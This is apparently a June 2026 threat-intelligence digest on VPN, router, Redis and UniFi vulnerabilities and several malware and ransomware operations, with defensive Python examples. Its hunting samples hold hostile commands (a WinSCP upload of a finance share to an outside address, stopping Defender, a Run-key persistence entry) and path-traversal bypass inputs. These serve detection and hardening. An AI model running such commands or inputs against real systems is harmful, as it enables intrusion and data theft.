Cyware Daily Threat Intelligence - June 08, 2026

Attackers are slashing through perimeter defenses by exploiting a logic flaw in Check Point VPNs, letting them bypass authentication and open VPN sessions without valid credentials. Cyware highlights how this vulnerability, tracked as CVE-2026-50751, is already under active attack, with exploitation ramping up since May 7, 2026. Organizations still relying on the deprecated IKEv1 protocol now face the risk of ransomware and data theft as Qilin actors leverage this flaw to breach remote-access infrastructure.
Credential theft is evolving as Lucid Stealer expands its reach beyond browser logins, targeting 18 browsers, crypto wallets, and Discord tokens. Attackers use a Node.js SEA wrapper and a multi-tenant web panel to automate theft and enable remote control, putting both personal and enterprise accounts at risk of takeover and fraud.
A years-old flaw in DD-WRT routers is fueling the growth of the C0XMO botnet, which hijacks devices with UPnP enabled and turns them into DDoS launchpads. Home users and organizations risk losing control of their connectivity as compromised routers are conscripted into attacks that disrupt services across the internet.
Top Malware Reported in the Last 24 Hours
C0XMO botnet hijacks DD-WRT routers
C0XMO is a botnet that hijacks DD-WRT routers by exploiting the years-old flaw CVE-2021-27137, turning infected devices into DDoS launchpads. C0XMO removes competing malware, uses compromised routers for denial-of-service attacks, and scans for additional vulnerable routers to expand its network. C0XMO can only compromise routers when UPnP is enabled, a setting that is off by default in DD-WRT, so exposed configurations are the primary risk. C0XMO targets both organizations and home users, impacting connectivity and conscripting internet links into disruptive attacks. Confirm that routers run a DD-WRT build that addresses CVE-2021-27137, and disable UPnP wherever it is not required.
Lucid Stealer raids browsers and wallets
Lucid Stealer is a credential-stealing malware that targets 18 browsers, crypto wallets, and Discord tokens, while also enabling remote access for attackers. Lucid Stealer hides its payload inside a Node.js single-executable application (SEA) wrapper and includes tooling for theft and hands-on abuse after infection. Lucid Stealer features a hosted multi-tenant web control panel and specific upload/log URI sequences, indicating ongoing development and organized operation. Lucid Stealer is distributed through Telegram-linked channels, putting both everyday users and employees at risk. Researchers emphasize that detection may depend more on behavioral patterns than on static file hashes, as Lucid Stealer evolves rapidly.
Gentlemen ransomware spreads across ESXi fleets
Gentlemen is a double-extortion ransomware operation active since July 2025 that targets Windows, Linux, and ESXi environments, encrypting systems and pressuring victims with stolen data. Gentlemen performs broad reconnaissance and exfiltrates data using tools such as WinSCP, increasing leverage over affected organizations. Gentlemen establishes persistence and evades defenses by creating scheduled tasks, modifying registry keys, and disabling security tools. Gentlemen spreads by abusing Group Policy Objects, enabling rapid impact across multiple systems. AttackIQ’s emulation demonstrates how operationalized and repeatable the group’s campaign has become.
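The behaviors listed above map onto a handful of standard Windows Security events: 4698 (scheduled task created), 4688 (process creation, with command-line auditing enabled) and 5136 (directory service object modified, which covers GPO edits on a domain controller). The following is an added example, not AttackIQ's emulation or the group's tooling, that runs those checks over a constructed set of events and then groups the hits by the account that performed them, since a single scheduled task is noise but a scheduled task plus a file-transfer tool plus a stopped security service plus a GPO edit by the same account is not. The service names, the registry-key pattern and the sample events are assumptions for the demo; tune them to your environment.

```python
"""Hunt for the Gentlemen tradecraft described above in Windows Security events.

Added example (not AttackIQ's emulation, not the group's tooling). Event IDs and
field names are the standard Windows Security log ones; the watchlists, regexes
and SAMPLE_EVENTS below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# Assumed watchlists: the page names WinSCP; the service names and Run-key pattern
# are generic examples of "disabling security tools" / "modifying registry keys".
EXFIL_TOOLS = {"winscp.exe"}
SECURITY_SERVICE_STOP_RE = re.compile(
    r"\bsc(?:\.exe)?\s+(?:stop|delete|config)\s+(?:WinDefend|Sense|MsMpSvc)\b", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    event_id: int
    technique: str
    account: str
    host: str
    detail: str


def analyze(events: Iterable[dict]) -> list[Finding]:
    """Return one Finding per event that matches a Gentlemen-style behavior."""
    findings: list[Finding] = []
    for ev in events:
        eid = ev.get("EventID")
        acct = ev.get("SubjectUserName", "?")
        host = ev.get("Computer", "?")
        if eid == 4698:  # A scheduled task was created
            findings.append(Finding(eid, "persistence: scheduled task", acct, host,
                                    str(ev.get("TaskName"))))
        elif eid == 4688:  # Process creation; needs command-line auditing enabled
            image = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
            cmd = ev.get("CommandLine", "")
            if image in EXFIL_TOOLS:
                findings.append(Finding(eid, "exfiltration: file-transfer tool", acct, host, cmd))
            elif SECURITY_SERVICE_STOP_RE.search(cmd):
                findings.append(Finding(eid, "defense evasion: security service stopped", acct, host, cmd))
            elif RUN_KEY_RE.search(cmd):
                findings.append(Finding(eid, "persistence: registry Run key", acct, host, cmd))
        elif eid == 5136 and ev.get("ObjectClass") == "groupPolicyContainer":
            # GPO edits are logged on the DC; the account is what ties them to the endpoint activity
            findings.append(Finding(eid, "lateral movement: GPO modified", acct, host,
                                    f"{ev.get('ObjectDN')} attr={ev.get('AttributeLDAPDisplayName')}"))
    return findings


def stages_by_account(findings: Iterable[Finding]) -> dict[str, set[str]]:
    """Distinct techniques observed per account, across hosts."""
    stages: dict[str, set[str]] = {}
    for f in findings:
        stages.setdefault(f.account, set()).add(f.technique)
    return stages


def accounts_with_chain(findings: Iterable[Finding], minimum: int = 3) -> set[str]:
    """Accounts that exhibit at least `minimum` distinct stages of the chain."""
    return {acct for acct, st in stages_by_account(findings).items() if len(st) >= minimum}


# Constructed sample events (not a real capture).
SAMPLE_EVENTS = [
    {"EventID": 4698, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "TaskName": "\\Microsoft\\Windows\\Update\\Sync"},
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Users\\Public\\WinSCP.exe",
     "CommandLine": "WinSCP.exe /command \"open sftp://203.0.113.7\" \"put C:\\Shares\\Finance\""},
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\sc.exe", "CommandLine": "sc stop WinDefend"},
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /d C:\\Users\\Public\\upd.exe"},
    {"EventID": 5136, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={11111111-2222-3333-4444-555555555555},CN=Policies,CN=System,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames"},
    {"EventID": 4688, "Computer": "WS12", "SubjectUserName": "jdoe",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.event_id} {f.host:<5} {f.account:<11} {f.technique}: {f.detail}")
    print("accounts with a multi-stage chain:", accounts_with_chain(found))
```

Grouping by account rather than by host is deliberate: the GPO edit shows up on the domain controller while the task, the WinSCP run and the service stop show up on the file server, and only the shared account links them.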
Top Vulnerabilities Reported in the Last 24 Hours
CVE-2026-50751: Authentication bypass in Check Point VPN (CVSS not specified)
CVE-2026-50751 is an authentication bypass vulnerability in Check Point VPN products that use the deprecated IKEv1 protocol. Successful exploitation allows attackers to establish VPN sessions without valid credentials, enabling unauthorized network access and potential data theft. CVE-2026-50751 is already being actively exploited in the wild, with activity starting on May 7, 2026 and increasing in early June. Check Point attributes exploitation to Qilin ransomware actors and notes the use of dedicated VPS infrastructure. A related certificate-validation issue, CVE-2026-50752, has been disclosed but not yet exploited. A fix is available via Check Point hotfixes for affected Mobile Access / SSL VPN, Remote Access VPN, and Spark Firewall products. Because the flaw sits in the IKEv1 flow, knowing which peers still negotiate IKEv1 tells you both where the hotfix is urgent and where the deprecated protocol can be retired outright.
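The IKE version a peer negotiates is visible in the first bytes of every IKE datagram: the fixed 28-byte ISAKMP header carries a version octet (major nibble 1 for IKEv1, 2 for IKEv2) and an exchange-type octet (Main Mode, Aggressive Mode and Quick Mode for IKEv1; IKE_SA_INIT and IKE_AUTH for IKEv2). The following is an added example, not Check Point's code and not tied to the vulnerable code path, that parses that header from raw UDP/500 and UDP/4500 payloads (handling the 4-byte non-ESP marker that NAT-T prepends) and inventories which source addresses are still talking IKEv1. The sample datagrams are constructed; to use it on real traffic, feed it the UDP payloads from a capture.

```python
"""Classify IKE headers to inventory peers still negotiating deprecated IKEv1.

Added example (not Check Point's code). Input is the raw UDP payload of each
datagram seen on udp/500 (plain IKE) or udp/4500 (NAT-T, prefixed by a 4-byte
non-ESP marker). SAMPLE below is constructed, not captured traffic.
"""
import struct
from dataclasses import dataclass
from typing import Iterable

# Common header (RFC 2408 for IKEv1, RFC 7296 for IKEv2):
# I-SPI(8) R-SPI(8) next-payload(1) version(1) exchange-type(1) flags(1) message-id(4) length(4)
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
NON_ESP_MARKER = b"\x00\x00\x00\x00"  # udp/4500: distinguishes IKE from ESP-in-UDP

IKEV1_EXCHANGES = {2: "Identity Protection (Main Mode)", 4: "Aggressive Mode",
                   5: "Informational", 32: "Quick Mode"}
IKEV2_EXCHANGES = {34: "IKE_SA_INIT", 35: "IKE_AUTH", 36: "CREATE_CHILD_SA", 37: "INFORMATIONAL"}


@dataclass(frozen=True)
class IkeHeader:
    initiator_spi: bytes
    responder_spi: bytes
    next_payload: int
    major: int
    minor: int
    exchange_type: int
    flags: int
    message_id: int
    length: int


def parse_ike_header(payload: bytes, nat_t: bool = False) -> IkeHeader:
    """Parse the fixed header; on udp/4500 strip the non-ESP marker first."""
    if nat_t:
        if not payload.startswith(NON_ESP_MARKER):
            raise ValueError("udp/4500 datagram is ESP-in-UDP, not IKE")
        payload = payload[len(NON_ESP_MARKER):]
    if len(payload) < ISAKMP_HDR.size:
        raise ValueError("datagram shorter than the IKE header")
    ispi, rspi, nxt, ver, exch, flags, msgid, length = ISAKMP_HDR.unpack_from(payload)
    if length != len(payload):
        raise ValueError(f"header length {length} != datagram length {len(payload)}")
    return IkeHeader(ispi, rspi, nxt, ver >> 4, ver & 0x0F, exch, flags, msgid, length)


def classify(payload: bytes, nat_t: bool = False) -> tuple[str, str]:
    """Return (protocol version, exchange-type name) for one datagram."""
    h = parse_ike_header(payload, nat_t)
    if h.major == 1:
        return "IKEv1", IKEV1_EXCHANGES.get(h.exchange_type, f"exchange {h.exchange_type}")
    if h.major == 2:
        return "IKEv2", IKEV2_EXCHANGES.get(h.exchange_type, f"exchange {h.exchange_type}")
    return "unknown", f"major version {h.major}"


def ikev1_peers(datagrams: Iterable[tuple[str, int, bytes]]) -> dict[str, set[str]]:
    """Map each source IP that sent IKEv1 to the exchange types it used.
    datagrams are (src_ip, dst_port, udp_payload); malformed or ESP datagrams are skipped."""
    peers: dict[str, set[str]] = {}
    for src, dport, payload in datagrams:
        try:
            version, exchange = classify(payload, nat_t=(dport == 4500))
        except ValueError:
            continue
        if version == "IKEv1":
            peers.setdefault(src, set()).add(exchange)
    return peers


def build_ike(major: int, exchange_type: int, ispi: bytes = b"\x11" * 8, body: bytes = b"") -> bytes:
    """Constructed test datagram: header (next payload 1 = SA) plus an opaque body."""
    return ISAKMP_HDR.pack(ispi, b"\x00" * 8, 1, major << 4, exchange_type, 0, 0,
                           ISAKMP_HDR.size + len(body)) + body


# Constructed sample: one peer still on IKEv1 (Main Mode, then Quick Mode over NAT-T),
# one peer on IKEv2, and one ESP-in-UDP datagram that must be ignored.
SAMPLE = [
    ("203.0.113.10", 500, build_ike(1, 2, body=b"\x00" * 16)),
    ("203.0.113.20", 500, build_ike(2, 34, ispi=b"\x22" * 8, body=b"\x00" * 16)),
    ("203.0.113.10", 4500, NON_ESP_MARKER + build_ike(1, 32, body=b"\x00" * 8)),
    ("203.0.113.30", 4500, b"\x00\x00\x00\x2a" + b"\x00" * 40),  # ESP, SPI 0x2a
]

if __name__ == "__main__":
    for ip, exchanges in ikev1_peers(SAMPLE).items():
        print(f"{ip} still negotiates IKEv1: {sorted(exchanges)}")
```

Run it against the UDP payloads from a capture on the VPN gateway's outside interface over a full business cycle; any peer that appears in the result is one whose tunnel depends on the deprecated protocol the hotfix addresses.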
UniFi OS Server vulnerability chain enables root takeover (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000)
A newly detailed vulnerability chain in UniFi OS Server (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000) enables unauthenticated remote code execution leading to root access. Attackers can seize the host and all managed assets by chaining an authentication-gateway bypass, path-traversal mismatch, and command-injection sink. No active exploitation has been reported. Once root is obtained, attackers can access JWT signing keys, TLS private keys, cloud tokens, user databases, RADIUS and Wi‑Fi credentials, and biometric data, and can push configuration and firewall changes. A fix is available in UniFi OS Server 5.0.8.
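The "path-traversal mismatch" link in a chain like this is worth seeing in isolation: an authentication gateway decides on the path as it arrived, a backend behind it decodes and normalizes the path before routing, and the two disagree about `..` and percent-encoded segments. The following is an added, generic illustration of that pattern, not UniFi OS Server code and not the reported exploit; the route prefixes and handler names are invented for the demo. The vulnerable gateway is shown next to a hardened one that normalizes the same way the backend will and refuses any path the normalization changed.

```python
"""Why a gateway/backend path-normalization mismatch bypasses authentication.

Added, generic illustration (not UniFi OS Server code, not the reported exploit).
PUBLIC_PREFIX / PRIVILEGED_PREFIX and the handler names are invented.
"""
import posixpath
from urllib.parse import unquote

PUBLIC_PREFIX = "/api/public/"      # reachable without a session (assumed)
PRIVILEGED_PREFIX = "/api/admin/"   # must never be reached unauthenticated (assumed)


def gateway_allows_unauthenticated(raw_path: str) -> bool:
    """Vulnerable gateway: prefix check on the raw path, before decoding or normalizing."""
    return raw_path.startswith(PUBLIC_PREFIX)


def backend_route(raw_path: str) -> str:
    """Backend: percent-decodes and normalizes the path before dispatch, as most frameworks do."""
    decoded = unquote(raw_path)
    normalized = posixpath.normpath(decoded)
    return normalized if normalized.startswith("/") else "/" + normalized


def _dispatch(raw_path: str, authenticated: bool, allow_unauth) -> str:
    if not authenticated and not allow_unauth(raw_path):
        return "401 gateway"
    route = backend_route(raw_path)
    if route.startswith(PRIVILEGED_PREFIX):
        return f"200 admin handler {route}"   # reaching this unauthenticated is the bypass
    return f"200 public handler {route}"


def vulnerable_dispatch(raw_path: str, authenticated: bool) -> str:
    return _dispatch(raw_path, authenticated, gateway_allows_unauthenticated)


def hardened_gateway_allows_unauthenticated(raw_path: str) -> bool:
    """Fixed gateway: decode once, reject double-encoding, and reject any path that
    normalization would change, so gateway and backend can never disagree."""
    decoded = unquote(raw_path)
    if unquote(decoded) != decoded:          # a second decode still changes it: double-encoded
        return False
    if posixpath.normpath(decoded) != decoded:   # contains '..', '.', '//' or a trailing slash
        return False
    return decoded.startswith(PUBLIC_PREFIX)


def hardened_dispatch(raw_path: str, authenticated: bool) -> str:
    return _dispatch(raw_path, authenticated, hardened_gateway_allows_unauthenticated)


if __name__ == "__main__":
    for path in ("/api/public/status", "/api/public/../admin/exec",
                 "/api/public/%2e%2e/admin/exec", "/api/admin/exec"):
        print(f"{path:<34} vulnerable={vulnerable_dispatch(path, False):<36} "
              f"hardened={hardened_dispatch(path, False)}")
```

The hardened check is deliberately strict: a path that normalization alters (even one with only a trailing slash) is refused rather than "fixed up", because the bypass exists precisely when two layers each fix the path up differently.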
CVE-2026-23631: Redis ‘DarkReplica’ flaw risks server hijack
CVE-2026-23631 is a critical vulnerability in Redis dubbed DarkReplica, allowing attackers with valid credentials to execute remote code and potentially hijack servers by corrupting memory in the replication subsystem. Successful exploitation involves triggering a race during replication while Redis runs Lua, using Lua primitives and heap manipulation to redirect execution. No active exploitation has been reported. The flaw is especially impactful in cloud-native and microservices environments where Redis manages sessions, queues, and application state, risking broad infrastructure compromise. A fix is available in Redis 7.2.14, 7.4.9, 8.2.6, 8.4.3, and 8.6.3. Since exploitation requires an authenticated account that can run Lua, limiting which ACL users hold the @scripting command category narrows the pool of accounts able to trigger it until the update is applied.
Top Threat Actors Reported in the Last 24 Hours
Qilin exploits Check Point VPN bypass
Qilin is a financially motivated ransomware group whose origin has not been established. Qilin exploits CVE-2026-50751 by leveraging a logic flaw in certificate validation within deprecated IKEv1 VPN flows. Qilin uses dedicated VPS infrastructure and targets Check Point Mobile Access / SSL VPN, Remote Access VPN, and Spark Firewall products. Qilin’s campaign enables network intrusion, data theft, and business disruption, especially if ransomware is deployed post-access. Exploitation began on May 7, 2026 and increased in early June, while a related issue (CVE-2026-50752) has not yet been exploited.
Frequently Asked Questions
What is C0XMO? C0XMO is a botnet that takes over DD-WRT routers by exploiting a years-old flaw, CVE-2021-27137, and turns infected devices into DDoS launchpads. It can only take over a router when UPnP is enabled, a setting that is off by default in DD-WRT, so exposed configurations are the key risk factor.
What is Lucid Stealer? Lucid Stealer is a credential-theft operation that goes beyond browser logins, targeting 18 browsers, crypto wallets, and Discord tokens, while also packing remote-access capability that lets criminals take control of a victim machine. It hides its payload in a Node.js SEA wrapper and bundles tooling designed to make theft and hands-on abuse easier once it lands. The researchers who first identified it describe a small but organized setup, complete with a hosted multi-tenant web panel and ongoing development plans to re-platform from Node.js to Java.
What is Gentlemen? Gentlemen is a double-extortion ransomware operation active since July 2025 that combines encryption with data theft to squeeze victims. It targets Windows, Linux, and ESXi environments, widening the blast radius for organizations that depend on virtualized infrastructure, and performs broad reconnaissance and exfiltrates data using tools such as WinSCP, increasing the leverage it holds over affected organizations.
What is CVE-2026-50751? Attackers are actively exploiting an authentication bypass in Check Point VPN deployments that use the deprecated IKEv1 protocol, letting them establish VPN sessions without valid credentials (CVE-2026-50751). The bypass stems from a logic flaw in certificate validation, turning a perimeter access system into an entry point for unauthorized network access and potential data theft.
What is CVE-2026-34908? A newly detailed vulnerability chain in UniFi OS Server can be abused for unauthenticated remote code execution that ends in root access, allowing an attacker to seize the host and everything it manages (CVE-2026-34908, CVE-2026-34909, CVE-2026-34910, CVE-2026-33000). The chain combines an authentication-gateway bypass, a path-traversal mismatch, and a command-injection sink, enabling crafted web requests to turn the admin interface into a remote shell.
What is CVE-2026-23631? A critical Redis vulnerability dubbed DarkReplica can let attackers with valid credentials execute remote code and potentially hijack servers by corrupting memory in Redis’s replication subsystem (CVE-2026-23631). The reported exploit path hinges on triggering a race during replication while Redis runs Lua, using Lua primitives and heap manipulation to steer execution toward attacker-controlled behavior.
What is Qilin? Qilin is the ransomware operation that this alert’s actor profile links to the active exploitation of CVE-2026-50751. By abusing a logic flaw in certificate validation in the deprecated IKEv1 VPN flow, its operators open Check Point VPN sessions without valid credentials, turning remote-access infrastructure into a fast path for network intrusion.